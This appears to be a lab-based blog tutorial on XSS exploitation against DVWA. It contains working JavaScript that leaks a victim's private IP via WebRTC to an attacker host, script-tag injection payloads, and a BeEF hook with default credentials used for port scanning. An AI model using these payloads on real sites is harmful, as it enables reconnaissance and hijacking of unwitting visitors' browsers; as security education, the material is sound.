Cross Site Scripting (XSS) beyond ‘alert()’ – Part 2

In the last post, I have presented how XSS is not all about ‘alerting’ the victim, rather a serious attack on the victim leveraging the vulnerable website. This post ll have demos on how to enumerate victim private IP, ping sweep, port scanning and finally using XSS exploitation frameworks such as BeeF.

For the demo, the victim machine (Ubuntu) is under NAT networking mode to get a private IP with respect to public IP of attacker machine (Kali) and DVWA who are in bridged networking mode.

Victim Network Enumeration

XSS can be useful in network attacks as well such as enumerating the victim behind NAT or Firewall. Using WebRTC functionality, I could grab the private IP of victim. A huge credit for this approach goes to @natevw . In simple words, this approach starts a bogus data channel  and reads the WebRTC ICE ‘candidate’ data, which is turn sent to the attacker server using ‘image’ object. The following javascript is hosted on Kali Machine.

var newPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var test_connect = new newPeerConnection({
iceServers: []
});
nofunc = function(){};
test_connect.createDataChannel("");
test_connect.createOffer().then(function (sdp) {
      test_connect.setLocalDescription(sdp, nofunc, nofunc);
    }).catch(function (reason) {
});

test_connect.onicecandidate = function (ice) {
   var img = new Image();
   img.src = "http://192.168.1.105/connect_data="+ice.candidate.candidate;
};

Injecting the code into DVWA using payload
<script type="text/javascript" src=http://192.168.1.105/xss_research/webrtc_private_ip_xss.js></script>

When this infected page is visited by a user, his private IP address is leaked to attacker server.

Appendix

This approach uses WebRTC feature. If WebRTC is not enabled, there is another approach described in The Browser Hacker’s Handbook (Chapter 10: Attacking Networks) , which uses XMLHttpRequest  to enumerate the user subnet and find the user subnet based on the difference in response time between active in active hosts. Robert Hansen observed that the response of XMLHttpRequest to an internal IP is swift when compared to the host that is not available. Do read about it. Using the same approach, there’s also a method described to do ping sweep of the network. Also, using the same image objects and XMLHttpRequest  one can achieve port scanning. All of these approaches and needed resources are mentioned in ‘References’ section. Due to modern browser settings such port banning, and extra technical detail which doesnt fall in the scope of the post, I chose to skip and left to the curiosity of the reader.

BeEF

It is a browser exploitation framework and is used extensively to ‘hook’ victim’s browser for malicious activities. This is usually achieved leveraging XSS vulnerability in websites.

Starting BeEF in Kali machine

Using the payload <script src="https://192.168.1.105:3000/hook.js"></script> , I trigger a stored XSS

Now, when this page is visited by a victim say with IP (192.168.1.100), an entry is shown in BeEF admin Panel, which can be accessed at http://127.0.0.1:3000/ui/panel in attacker machine with username ‘beef’ and password ‘beef’

Now BeEF has various modules one can explore and have fun. I ll show a demo of port scanning the victim.

Browsing Commands > Network > Port Scanner gives

Editing the options and execute it.

The result shows open ports 22 and 80.

To detect if the victim is a virtual machine, use Commands > Host > Detect Virtual Machine

If you are a Red Teamer, knowing XSS+BeEF approach is must.

This was a sincere attempt to present dangers that XSS pose. Best ways to mitigate XSS is using input sanitisation, context-aware output encoding. Lastly Never trust user input!! 🙂

References that say XSS is not about alert()

2 thoughts on “Cross Site Scripting (XSS) beyond ‘alert()’ – Part 2

Leave a Reply

Your email address will not be published. Required fields are marked *